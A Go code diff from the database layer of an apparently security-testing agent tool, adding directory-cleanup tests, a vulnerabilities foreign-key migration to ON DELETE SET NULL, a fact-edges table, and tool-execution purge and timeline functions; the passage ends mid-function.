defer db.Close()
|
||||||
|
|
||||||
|
plantaskBase := filepath.Join(tmp, "skills", ".eino", "plantask")
|
||||||
|
checkpointBase := filepath.Join(tmp, "eino-checkpoints")
|
||||||
|
reductionBase := filepath.Join(tmp, "reduction")
|
||||||
|
db.SetEinoConversationDirs(plantaskBase, checkpointBase, reductionBase)
|
||||||
|
|
||||||
|
conv, err := db.CreateConversation("cleanup test", ConversationCreateMeta{})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateConversation: %v", err)
|
||||||
|
}
|
||||||
|
convID := conv.ID
|
||||||
|
seg := sanitizeConversationPathSegment(convID)
|
||||||
|
for _, base := range []struct {
|
||||||
|
root string
|
||||||
|
file string
|
||||||
|
}{
|
||||||
|
{db.conversationArtifactsDir, "transcript.txt"},
|
||||||
|
{plantaskBase, "task-1.json"},
|
||||||
|
{checkpointBase, "runner-deep.ckpt"},
|
||||||
|
{filepath.Join(reductionBase, "conversations"), "tool-output.txt"},
|
||||||
|
} {
|
||||||
|
dir := filepath.Join(base.root, seg)
|
||||||
|
if err := os.MkdirAll(dir, 0o755); err != nil {
|
||||||
|
t.Fatalf("mkdir %s: %v", dir, err)
|
||||||
|
}
|
||||||
|
if err := os.WriteFile(filepath.Join(dir, base.file), []byte("x"), 0o644); err != nil {
|
||||||
|
t.Fatalf("write %s: %v", base.file, err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if err := db.DeleteConversation(convID); err != nil {
|
||||||
|
t.Fatalf("DeleteConversation: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
for _, base := range []string{db.conversationArtifactsDir, plantaskBase, checkpointBase, filepath.Join(reductionBase, "conversations")} {
|
||||||
|
dir := filepath.Join(base, seg)
|
||||||
|
if _, statErr := os.Stat(dir); !os.IsNotExist(statErr) {
|
||||||
|
t.Fatalf("expected removed dir %s, stat err=%v", dir, statErr)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestDeleteProjectRemovesReductionDir(t *testing.T) {
|
||||||
|
tmp := t.TempDir()
|
||||||
|
dbPath := filepath.Join(tmp, "conversations.db")
|
||||||
|
db, err := NewDB(dbPath, zap.NewNop())
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("NewDB: %v", err)
|
||||||
|
}
|
||||||
|
defer db.Close()
|
||||||
|
|
||||||
|
reductionBase := filepath.Join(tmp, "reduction")
|
||||||
|
db.SetEinoConversationDirs("", "", reductionBase)
|
||||||
|
|
||||||
|
project, err := db.CreateProject(&Project{Name: "cleanup test"})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateProject: %v", err)
|
||||||
|
}
|
||||||
|
seg := sanitizeConversationPathSegment(project.ID)
|
||||||
|
reductionDir := filepath.Join(reductionBase, "projects", seg, "clear")
|
||||||
|
if err := os.MkdirAll(reductionDir, 0o755); err != nil {
|
||||||
|
t.Fatalf("mkdir %s: %v", reductionDir, err)
|
||||||
|
}
|
||||||
|
if err := os.WriteFile(filepath.Join(reductionDir, "call-1.txt"), []byte("x"), 0o644); err != nil {
|
||||||
|
t.Fatalf("write: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
if err := db.DeleteProject(project.ID); err != nil {
|
||||||
|
t.Fatalf("DeleteProject: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
projectReductionDir := filepath.Join(reductionBase, "projects", seg)
|
||||||
|
if _, statErr := os.Stat(projectReductionDir); !os.IsNotExist(statErr) {
|
||||||
|
t.Fatalf("expected removed dir %s, stat err=%v", projectReductionDir, statErr)
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -0,0 +1,69 @@
|
|||||||
|
package database
|
||||||
|
|
||||||
|
import (
|
||||||
|
"path/filepath"
|
||||||
|
"testing"
|
||||||
|
|
||||||
|
"go.uber.org/zap"
|
||||||
|
)
|
||||||
|
|
||||||
|
func TestDeleteConversationPreservesVulnerabilities(t *testing.T) {
|
||||||
|
tmp := t.TempDir()
|
||||||
|
dbPath := filepath.Join(tmp, "vuln-preserve.db")
|
||||||
|
db, err := NewDB(dbPath, zap.NewNop())
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("NewDB: %v", err)
|
||||||
|
}
|
||||||
|
defer db.Close()
|
||||||
|
|
||||||
|
conv, err := db.CreateConversation("vuln source chat", ConversationCreateMeta{})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateConversation: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
vuln, err := db.CreateVulnerability(&Vulnerability{
|
||||||
|
ConversationID: conv.ID,
|
||||||
|
Title: "SQL Injection",
|
||||||
|
Severity: "high",
|
||||||
|
Status: "open",
|
||||||
|
})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateVulnerability: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
if err := db.DeleteConversation(conv.ID); err != nil {
|
||||||
|
t.Fatalf("DeleteConversation: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
got, err := db.GetVulnerability(vuln.ID)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetVulnerability after delete: %v", err)
|
||||||
|
}
|
||||||
|
if got.Title != "SQL Injection" {
|
||||||
|
t.Fatalf("title = %q, want SQL Injection", got.Title)
|
||||||
|
}
|
||||||
|
if got.ConversationID != "" {
|
||||||
|
t.Fatalf("conversation_id = %q, want empty after conversation delete", got.ConversationID)
|
||||||
|
}
|
||||||
|
if got.ConversationTag != "vuln source chat" {
|
||||||
|
t.Fatalf("conversation_tag = %q, want vuln source chat", got.ConversationTag)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestMigrateVulnerabilitiesConversationFK(t *testing.T) {
|
||||||
|
tmp := t.TempDir()
|
||||||
|
dbPath := filepath.Join(tmp, "vuln-fk-migrate.db")
|
||||||
|
db, err := NewDB(dbPath, zap.NewNop())
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("NewDB: %v", err)
|
||||||
|
}
|
||||||
|
defer db.Close()
|
||||||
|
|
||||||
|
ok, err := vulnerabilitiesConversationFKOnDeleteSetNull(db.DB)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("vulnerabilitiesConversationFKOnDeleteSetNull: %v", err)
|
||||||
|
}
|
||||||
|
if !ok {
|
||||||
|
t.Fatal("expected vulnerabilities.conversation_id FK to use ON DELETE SET NULL")
|
||||||
|
}
|
||||||
|
}
|
||||||
+149
-44
@@ -49,6 +49,9 @@ type DB struct {
|
|||||||
*sql.DB
|
*sql.DB
|
||||||
logger *zap.Logger
|
logger *zap.Logger
|
||||||
conversationArtifactsDir string
|
conversationArtifactsDir string
|
||||||
|
einoPlantaskBaseDir string // skills_dir + plantask_rel_dir (per-conversation subdirs)
|
||||||
|
einoCheckpointBaseDir string // checkpoint_dir root (per-conversation subdirs)
|
||||||
|
einoReductionRootDir string // reduction_root_dir or default tmp/reduction (conversations/<id> subdirs)
|
||||||
checkpointLoopName string
|
checkpointLoopName string
|
||||||
checkpointStop chan struct{}
|
checkpointStop chan struct{}
|
||||||
checkpointDone chan struct{}
|
checkpointDone chan struct{}
|
||||||
@@ -155,6 +158,18 @@ func NewDB(dbPath string, logger *zap.Logger) (*DB, error) {
|
|||||||
return database, nil
|
return database, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// SetEinoConversationDirs configures best-effort filesystem cleanup on DeleteConversation.
|
||||||
|
// plantaskBase is skills_root/plantask_rel (no conversation id); checkpointBase is checkpoint_dir root.
|
||||||
|
// reductionRoot is reduction_root_dir from config; empty uses tmp/reduction (conversation-scoped subdirs only).
|
||||||
|
func (db *DB) SetEinoConversationDirs(plantaskBase, checkpointBase, reductionRoot string) {
|
||||||
|
if db == nil {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
db.einoPlantaskBaseDir = strings.TrimSpace(plantaskBase)
|
||||||
|
db.einoCheckpointBaseDir = strings.TrimSpace(checkpointBase)
|
||||||
|
db.einoReductionRootDir = strings.TrimSpace(reductionRoot)
|
||||||
|
}
|
||||||
|
|
||||||
// initTables 初始化数据库表
|
// initTables 初始化数据库表
|
||||||
func (db *DB) initTables() error {
|
func (db *DB) initTables() error {
|
||||||
// 创建对话表(last_react_input / last_react_output 存「代理消息轨迹」JSON 与助手摘要,列名保留以兼容已有库)
|
// 创建对话表(last_react_input / last_react_output 存「代理消息轨迹」JSON 与助手摘要,列名保留以兼容已有库)
|
||||||
@@ -334,7 +349,6 @@ func (db *DB) initTables() error {
|
|||||||
source_conversation_id TEXT,
|
source_conversation_id TEXT,
|
||||||
source_message_id TEXT,
|
source_message_id TEXT,
|
||||||
pinned INTEGER NOT NULL DEFAULT 0,
|
pinned INTEGER NOT NULL DEFAULT 0,
|
||||||
supersedes_fact_id TEXT,
|
|
||||||
related_vulnerability_id TEXT,
|
related_vulnerability_id TEXT,
|
||||||
created_at DATETIME NOT NULL,
|
created_at DATETIME NOT NULL,
|
||||||
updated_at DATETIME NOT NULL,
|
updated_at DATETIME NOT NULL,
|
||||||
@@ -342,30 +356,27 @@ func (db *DB) initTables() error {
|
|||||||
UNIQUE(project_id, fact_key)
|
UNIQUE(project_id, fact_key)
|
||||||
);`
|
);`
|
||||||
|
|
||||||
createProjectFactVersionsTable := `
|
// 项目事实关系边(黑板 DAG)
|
||||||
CREATE TABLE IF NOT EXISTS project_fact_versions (
|
createProjectFactEdgesTable := `
|
||||||
|
CREATE TABLE IF NOT EXISTS project_fact_edges (
|
||||||
id TEXT PRIMARY KEY,
|
id TEXT PRIMARY KEY,
|
||||||
fact_id TEXT NOT NULL,
|
|
||||||
project_id TEXT NOT NULL,
|
project_id TEXT NOT NULL,
|
||||||
fact_key TEXT NOT NULL,
|
source_fact_key TEXT NOT NULL,
|
||||||
category TEXT NOT NULL DEFAULT 'note',
|
target_fact_key TEXT NOT NULL,
|
||||||
summary TEXT NOT NULL DEFAULT '',
|
edge_type TEXT NOT NULL,
|
||||||
body TEXT,
|
|
||||||
confidence TEXT NOT NULL DEFAULT 'tentative',
|
confidence TEXT NOT NULL DEFAULT 'tentative',
|
||||||
source_conversation_id TEXT,
|
source_conversation_id TEXT,
|
||||||
source_message_id TEXT,
|
created_at DATETIME NOT NULL,
|
||||||
pinned INTEGER NOT NULL DEFAULT 0,
|
updated_at DATETIME NOT NULL,
|
||||||
related_vulnerability_id TEXT,
|
FOREIGN KEY (project_id) REFERENCES projects(id) ON DELETE CASCADE,
|
||||||
archived_at DATETIME NOT NULL,
|
UNIQUE(project_id, source_fact_key, target_fact_key, edge_type)
|
||||||
FOREIGN KEY (fact_id) REFERENCES project_facts(id) ON DELETE CASCADE,
|
|
||||||
FOREIGN KEY (project_id) REFERENCES projects(id) ON DELETE CASCADE
|
|
||||||
);`
|
);`
|
||||||
|
|
||||||
// 创建漏洞表
|
// 创建漏洞表
|
||||||
createVulnerabilitiesTable := `
|
createVulnerabilitiesTable := `
|
||||||
CREATE TABLE IF NOT EXISTS vulnerabilities (
|
CREATE TABLE IF NOT EXISTS vulnerabilities (
|
||||||
id TEXT PRIMARY KEY,
|
id TEXT PRIMARY KEY,
|
||||||
conversation_id TEXT NOT NULL,
|
conversation_id TEXT,
|
||||||
conversation_tag TEXT,
|
conversation_tag TEXT,
|
||||||
task_tag TEXT,
|
task_tag TEXT,
|
||||||
title TEXT NOT NULL,
|
title TEXT NOT NULL,
|
||||||
@@ -379,7 +390,8 @@ func (db *DB) initTables() error {
|
|||||||
recommendation TEXT,
|
recommendation TEXT,
|
||||||
created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
|
created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
|
||||||
updated_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
|
updated_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
|
||||||
FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE CASCADE
|
project_id TEXT,
|
||||||
|
FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE SET NULL
|
||||||
);`
|
);`
|
||||||
|
|
||||||
// 创建批量任务队列表
|
// 创建批量任务队列表
|
||||||
@@ -598,7 +610,9 @@ func (db *DB) initTables() error {
|
|||||||
CREATE INDEX IF NOT EXISTS idx_project_facts_project_id ON project_facts(project_id);
|
CREATE INDEX IF NOT EXISTS idx_project_facts_project_id ON project_facts(project_id);
|
||||||
CREATE INDEX IF NOT EXISTS idx_project_facts_confidence ON project_facts(confidence);
|
CREATE INDEX IF NOT EXISTS idx_project_facts_confidence ON project_facts(confidence);
|
||||||
CREATE INDEX IF NOT EXISTS idx_project_facts_related_vuln ON project_facts(related_vulnerability_id);
|
CREATE INDEX IF NOT EXISTS idx_project_facts_related_vuln ON project_facts(related_vulnerability_id);
|
||||||
CREATE INDEX IF NOT EXISTS idx_project_fact_versions_fact_id ON project_fact_versions(fact_id);
|
CREATE INDEX IF NOT EXISTS idx_project_fact_edges_project ON project_fact_edges(project_id);
|
||||||
|
CREATE INDEX IF NOT EXISTS idx_project_fact_edges_source ON project_fact_edges(project_id, source_fact_key);
|
||||||
|
CREATE INDEX IF NOT EXISTS idx_project_fact_edges_target ON project_fact_edges(project_id, target_fact_key);
|
||||||
CREATE INDEX IF NOT EXISTS idx_conversations_project_id ON conversations(project_id);
|
CREATE INDEX IF NOT EXISTS idx_conversations_project_id ON conversations(project_id);
|
||||||
CREATE INDEX IF NOT EXISTS idx_vulnerabilities_project_id ON vulnerabilities(project_id);
|
CREATE INDEX IF NOT EXISTS idx_vulnerabilities_project_id ON vulnerabilities(project_id);
|
||||||
CREATE INDEX IF NOT EXISTS idx_batch_tasks_queue_id ON batch_tasks(queue_id);
|
CREATE INDEX IF NOT EXISTS idx_batch_tasks_queue_id ON batch_tasks(queue_id);
|
||||||
@@ -680,8 +694,8 @@ func (db *DB) initTables() error {
|
|||||||
return fmt.Errorf("创建project_facts表失败: %w", err)
|
return fmt.Errorf("创建project_facts表失败: %w", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
if _, err := db.Exec(createProjectFactVersionsTable); err != nil {
|
if _, err := db.Exec(createProjectFactEdgesTable); err != nil {
|
||||||
return fmt.Errorf("创建project_fact_versions表失败: %w", err)
|
return fmt.Errorf("创建project_fact_edges表失败: %w", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
if _, err := db.Exec(createVulnerabilitiesTable); err != nil {
|
if _, err := db.Exec(createVulnerabilitiesTable); err != nil {
|
||||||
@@ -750,12 +764,15 @@ func (db *DB) initTables() error {
|
|||||||
db.logger.Warn("迁移vulnerabilities表失败", zap.Error(err))
|
db.logger.Warn("迁移vulnerabilities表失败", zap.Error(err))
|
||||||
// 不返回错误,允许继续运行
|
// 不返回错误,允许继续运行
|
||||||
}
|
}
|
||||||
|
if err := db.migrateVulnerabilitiesConversationFK(); err != nil {
|
||||||
|
db.logger.Warn("迁移vulnerabilities会话外键失败", zap.Error(err))
|
||||||
|
}
|
||||||
|
|
||||||
if err := db.migrateProjectsTable(); err != nil {
|
if err := db.migrateProjectsTable(); err != nil {
|
||||||
db.logger.Warn("迁移projects相关表失败", zap.Error(err))
|
db.logger.Warn("迁移projects相关表失败", zap.Error(err))
|
||||||
}
|
}
|
||||||
if err := db.migrateProjectFactVersionsTable(); err != nil {
|
if err := db.dropProjectFactVersionsTable(); err != nil {
|
||||||
db.logger.Warn("迁移project_fact_versions表失败", zap.Error(err))
|
db.logger.Warn("清理project_fact_versions表失败", zap.Error(err))
|
||||||
}
|
}
|
||||||
|
|
||||||
if err := db.migrateWebshellConnectionsTable(); err != nil {
|
if err := db.migrateWebshellConnectionsTable(); err != nil {
|
||||||
@@ -1153,34 +1170,122 @@ func (db *DB) migrateProjectsTable() error {
|
|||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
// migrateProjectFactVersionsTable 为已有库创建事实版本表。
|
// dropProjectFactVersionsTable 移除已废弃的事实版本归档表。
|
||||||
func (db *DB) migrateProjectFactVersionsTable() error {
|
func (db *DB) dropProjectFactVersionsTable() error {
|
||||||
ddl := `
|
_, err := db.Exec(`DROP TABLE IF EXISTS project_fact_versions`)
|
||||||
CREATE TABLE IF NOT EXISTS project_fact_versions (
|
return err
|
||||||
id TEXT PRIMARY KEY,
|
}
|
||||||
fact_id TEXT NOT NULL,
|
|
||||||
project_id TEXT NOT NULL,
|
// migrateVulnerabilitiesConversationFK 将 vulnerabilities.conversation_id 外键改为 ON DELETE SET NULL,删除对话时保留漏洞记录。
|
||||||
fact_key TEXT NOT NULL,
|
func (db *DB) migrateVulnerabilitiesConversationFK() error {
|
||||||
category TEXT NOT NULL DEFAULT 'note',
|
ok, err := vulnerabilitiesConversationFKOnDeleteSetNull(db.DB)
|
||||||
summary TEXT NOT NULL DEFAULT '',
|
if err != nil {
|
||||||
body TEXT,
|
|
||||||
confidence TEXT NOT NULL DEFAULT 'tentative',
|
|
||||||
source_conversation_id TEXT,
|
|
||||||
source_message_id TEXT,
|
|
||||||
pinned INTEGER NOT NULL DEFAULT 0,
|
|
||||||
related_vulnerability_id TEXT,
|
|
||||||
archived_at DATETIME NOT NULL,
|
|
||||||
FOREIGN KEY (fact_id) REFERENCES project_facts(id) ON DELETE CASCADE,
|
|
||||||
FOREIGN KEY (project_id) REFERENCES projects(id) ON DELETE CASCADE
|
|
||||||
);`
|
|
||||||
if _, err := db.Exec(ddl); err != nil {
|
|
||||||
return err
|
return err
|
||||||
}
|
}
|
||||||
_, _ = db.Exec(`CREATE INDEX IF NOT EXISTS idx_project_fact_versions_fact_id ON project_fact_versions(fact_id)`)
|
if ok {
|
||||||
_, _ = db.Exec(`CREATE INDEX IF NOT EXISTS idx_project_facts_related_vuln ON project_facts(related_vulnerability_id)`)
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
tx, err := db.Begin()
|
||||||
|
if err != nil {
|
||||||
|
return fmt.Errorf("开启事务失败: %w", err)
|
||||||
|
}
|
||||||
|
defer func() { _ = tx.Rollback() }()
|
||||||
|
|
||||||
|
const createNew = `
|
||||||
|
CREATE TABLE vulnerabilities_new (
|
||||||
|
id TEXT PRIMARY KEY,
|
||||||
|
conversation_id TEXT,
|
||||||
|
conversation_tag TEXT,
|
||||||
|
task_tag TEXT,
|
||||||
|
title TEXT NOT NULL,
|
||||||
|
description TEXT,
|
||||||
|
severity TEXT NOT NULL,
|
||||||
|
status TEXT NOT NULL DEFAULT 'open',
|
||||||
|
vulnerability_type TEXT,
|
||||||
|
target TEXT,
|
||||||
|
proof TEXT,
|
||||||
|
impact TEXT,
|
||||||
|
recommendation TEXT,
|
||||||
|
created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
|
||||||
|
updated_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
|
||||||
|
project_id TEXT,
|
||||||
|
FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE SET NULL
|
||||||
|
);`
|
||||||
|
if _, err := tx.Exec(createNew); err != nil {
|
||||||
|
return fmt.Errorf("创建 vulnerabilities_new 失败: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
const copyRows = `
|
||||||
|
INSERT INTO vulnerabilities_new (
|
||||||
|
id, conversation_id, conversation_tag, task_tag, title, description,
|
||||||
|
severity, status, vulnerability_type, target, proof, impact, recommendation,
|
||||||
|
created_at, updated_at, project_id
|
||||||
|
)
|
||||||
|
SELECT
|
||||||
|
id, conversation_id, conversation_tag, task_tag, title, description,
|
||||||
|
severity, status, vulnerability_type, target, proof, impact, recommendation,
|
||||||
|
created_at, updated_at, project_id
|
||||||
|
FROM vulnerabilities;`
|
||||||
|
if _, err := tx.Exec(copyRows); err != nil {
|
||||||
|
return fmt.Errorf("复制 vulnerabilities 数据失败: %w", err)
|
||||||
|
}
|
||||||
|
if _, err := tx.Exec(`DROP TABLE vulnerabilities`); err != nil {
|
||||||
|
return fmt.Errorf("删除旧 vulnerabilities 表失败: %w", err)
|
||||||
|
}
|
||||||
|
if _, err := tx.Exec(`ALTER TABLE vulnerabilities_new RENAME TO vulnerabilities`); err != nil {
|
||||||
|
return fmt.Errorf("重命名 vulnerabilities 表失败: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
indexes := []string{
|
||||||
|
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_conversation_id ON vulnerabilities(conversation_id)`,
|
||||||
|
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_conversation_tag ON vulnerabilities(conversation_tag)`,
|
||||||
|
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_task_tag ON vulnerabilities(task_tag)`,
|
||||||
|
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_severity ON vulnerabilities(severity)`,
|
||||||
|
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_status ON vulnerabilities(status)`,
|
||||||
|
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_created_at ON vulnerabilities(created_at)`,
|
||||||
|
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_project_id ON vulnerabilities(project_id)`,
|
||||||
|
}
|
||||||
|
for _, stmt := range indexes {
|
||||||
|
if _, err := tx.Exec(stmt); err != nil {
|
||||||
|
return fmt.Errorf("重建 vulnerabilities 索引失败: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if err := tx.Commit(); err != nil {
|
||||||
|
return fmt.Errorf("提交 vulnerabilities 外键迁移失败: %w", err)
|
||||||
|
}
|
||||||
|
db.logger.Info("vulnerabilities 表已迁移:删除对话时保留漏洞记录")
|
||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func vulnerabilitiesConversationFKOnDeleteSetNull(db *sql.DB) (bool, error) {
|
||||||
|
rows, err := db.Query(`PRAGMA foreign_key_list(vulnerabilities)`)
|
||||||
|
if err != nil {
|
||||||
|
return false, err
|
||||||
|
}
|
||||||
|
defer rows.Close()
|
||||||
|
|
||||||
|
found := false
|
||||||
|
for rows.Next() {
|
||||||
|
var id, seq int
|
||||||
|
var table, from, to, onUpdate, onDelete, match string
|
||||||
|
if err := rows.Scan(&id, &seq, &table, &from, &to, &onUpdate, &onDelete, &match); err != nil {
|
||||||
|
return false, err
|
||||||
|
}
|
||||||
|
if from == "conversation_id" {
|
||||||
|
found = true
|
||||||
|
if !strings.EqualFold(onDelete, "SET NULL") {
|
||||||
|
return false, nil
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if err := rows.Err(); err != nil {
|
||||||
|
return false, err
|
||||||
|
}
|
||||||
|
return found, nil
|
||||||
|
}
|
||||||
|
|
||||||
// migrateVulnerabilitiesTable 迁移 vulnerabilities 表,补充标签字段
|
// migrateVulnerabilitiesTable 迁移 vulnerabilities 表,补充标签字段
|
||||||
func (db *DB) migrateVulnerabilitiesTable() error {
|
func (db *DB) migrateVulnerabilitiesTable() error {
|
||||||
columns := []struct {
|
columns := []struct {
|
||||||
|
|||||||
@@ -3,6 +3,7 @@ package database
|
|||||||
import (
|
import (
|
||||||
"database/sql"
|
"database/sql"
|
||||||
"encoding/json"
|
"encoding/json"
|
||||||
|
"sort"
|
||||||
"strings"
|
"strings"
|
||||||
"time"
|
"time"
|
||||||
|
|
||||||
@@ -71,6 +72,23 @@ func (db *DB) SaveToolExecution(exec *mcp.ToolExecution) error {
|
|||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// UpdateToolExecutionResult 仅更新结果字段(用于 reduction 后将监控展示与模型上下文对齐)。
|
||||||
|
func (db *DB) UpdateToolExecutionResult(id string, result *mcp.ToolResult) error {
|
||||||
|
id = strings.TrimSpace(id)
|
||||||
|
if id == "" || result == nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
resultBytes, err := json.Marshal(result)
|
||||||
|
if err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
_, err = db.Exec(`UPDATE tool_executions SET result = ? WHERE id = ?`, string(resultBytes), id)
|
||||||
|
if err != nil {
|
||||||
|
db.logger.Warn("更新工具执行结果失败", zap.Error(err), zap.String("executionId", id))
|
||||||
|
}
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
|
||||||
// CountToolExecutions 统计工具执行记录总数
|
// CountToolExecutions 统计工具执行记录总数
|
||||||
func (db *DB) CountToolExecutions(status, toolName string) (int, error) {
|
func (db *DB) CountToolExecutions(status, toolName string) (int, error) {
|
||||||
query := `SELECT COUNT(*) FROM tool_executions`
|
query := `SELECT COUNT(*) FROM tool_executions`
|
||||||
@@ -392,6 +410,76 @@ func (db *DB) GetToolExecutionsByIds(ids []string) ([]*mcp.ToolExecution, error)
|
|||||||
return executions, nil
|
return executions, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
type toolExecutionStatDelta struct {
|
||||||
|
totalCalls int
|
||||||
|
successCalls int
|
||||||
|
failedCalls int
|
||||||
|
}
|
||||||
|
|
||||||
|
// PurgeToolExecutionsBefore deletes executions older than cutoff and adjusts tool_stats.
|
||||||
|
func (db *DB) PurgeToolExecutionsBefore(cutoff time.Time) (int64, error) {
|
||||||
|
query := `
|
||||||
|
SELECT tool_name, status, COUNT(*) AS cnt
|
||||||
|
FROM tool_executions
|
||||||
|
WHERE ` + sqliteEpochGE("start_time", "<") + `
|
||||||
|
GROUP BY tool_name, status
|
||||||
|
`
|
||||||
|
rows, err := db.Query(query, formatSQLiteUTC(cutoff))
|
||||||
|
if err != nil {
|
||||||
|
return 0, err
|
||||||
|
}
|
||||||
|
defer rows.Close()
|
||||||
|
|
||||||
|
deltas := make(map[string]*toolExecutionStatDelta)
|
||||||
|
for rows.Next() {
|
||||||
|
var toolName, status string
|
||||||
|
var count int
|
||||||
|
if err := rows.Scan(&toolName, &status, &count); err != nil {
|
||||||
|
db.logger.Warn("读取待清理执行记录统计失败", zap.Error(err))
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
toolName = strings.TrimSpace(toolName)
|
||||||
|
if toolName == "" || count <= 0 {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
delta := deltas[toolName]
|
||||||
|
if delta == nil {
|
||||||
|
delta = &toolExecutionStatDelta{}
|
||||||
|
deltas[toolName] = delta
|
||||||
|
}
|
||||||
|
delta.totalCalls += count
|
||||||
|
switch status {
|
||||||
|
case "failed", "cancelled":
|
||||||
|
delta.failedCalls += count
|
||||||
|
case "completed":
|
||||||
|
delta.successCalls += count
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if err := rows.Err(); err != nil {
|
||||||
|
return 0, err
|
||||||
|
}
|
||||||
|
|
||||||
|
res, err := db.Exec(`DELETE FROM tool_executions WHERE `+sqliteEpochGE("start_time", "<"), formatSQLiteUTC(cutoff))
|
||||||
|
if err != nil {
|
||||||
|
return 0, err
|
||||||
|
}
|
||||||
|
deleted, err := res.RowsAffected()
|
||||||
|
if err != nil {
|
||||||
|
return 0, err
|
||||||
|
}
|
||||||
|
|
||||||
|
for toolName, delta := range deltas {
|
||||||
|
if err := db.DecreaseToolStats(toolName, delta.totalCalls, delta.successCalls, delta.failedCalls); err != nil {
|
||||||
|
db.logger.Warn("清理过期执行记录后更新统计失败",
|
||||||
|
zap.Error(err),
|
||||||
|
zap.String("toolName", toolName),
|
||||||
|
)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return deleted, nil
|
||||||
|
}
|
||||||
|
|
||||||
// SaveToolStats 保存工具统计信息
|
// SaveToolStats 保存工具统计信息
|
||||||
func (db *DB) SaveToolStats(toolName string, stats *mcp.ToolStats) error {
|
func (db *DB) SaveToolStats(toolName string, stats *mcp.ToolStats) error {
|
||||||
var lastCallTime sql.NullTime
|
var lastCallTime sql.NullTime
|
||||||
@@ -493,6 +581,68 @@ func (db *DB) UpdateToolStats(toolName string, totalCalls, successCalls, failedC
|
|||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// CallsTimelineBucket 调用趋势时间桶
|
||||||
|
type CallsTimelineBucket struct {
|
||||||
|
BucketTime time.Time
|
||||||
|
Total int
|
||||||
|
Failed int
|
||||||
|
}
|
||||||
|
|
||||||
|
// truncateCallsTimelineBucket 将时间截断到趋势图桶边界(本地时区,与 handler 侧 truncateToBucket 一致)
|
||||||
|
func truncateCallsTimelineBucket(t time.Time, dailyBuckets bool) time.Time {
|
||||||
|
t = t.In(time.Local)
|
||||||
|
if dailyBuckets {
|
||||||
|
y, m, d := t.Date()
|
||||||
|
return time.Date(y, m, d, 0, 0, 0, 0, time.Local)
|
||||||
|
}
|
||||||
|
return t.Truncate(time.Hour)
|
||||||
|
}
|
||||||
|
|
||||||
|
// LoadCallsTimeline 按时间范围加载调用趋势(since 起至今,含边界)
|
||||||
|
func (db *DB) LoadCallsTimeline(since time.Time, dailyBuckets bool) ([]CallsTimelineBucket, error) {
|
||||||
|
// 在 Go 侧按本地时区分桶,避免 SQLite strftime 对 UTC 存储时间分桶后再误当本地时间解析(差 8h 等问题)
|
||||||
|
query := `
|
||||||
|
SELECT start_time,
|
||||||
|
CASE WHEN status IN ('failed', 'cancelled') THEN 1 ELSE 0 END AS failed
|
||||||
|
FROM tool_executions
|
||||||
|
WHERE start_time >= ?
|
||||||
|
`
|
||||||
|
|
||||||
|
rows, err := db.Query(query, since)
|
||||||
|
if err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
defer rows.Close()
|
||||||
|
|
||||||
|
bucketMap := make(map[time.Time]struct{ total, failed int })
|
||||||
|
for rows.Next() {
|
||||||
|
var startTime time.Time
|
||||||
|
var failed int
|
||||||
|
if err := rows.Scan(&startTime, &failed); err != nil {
|
||||||
|
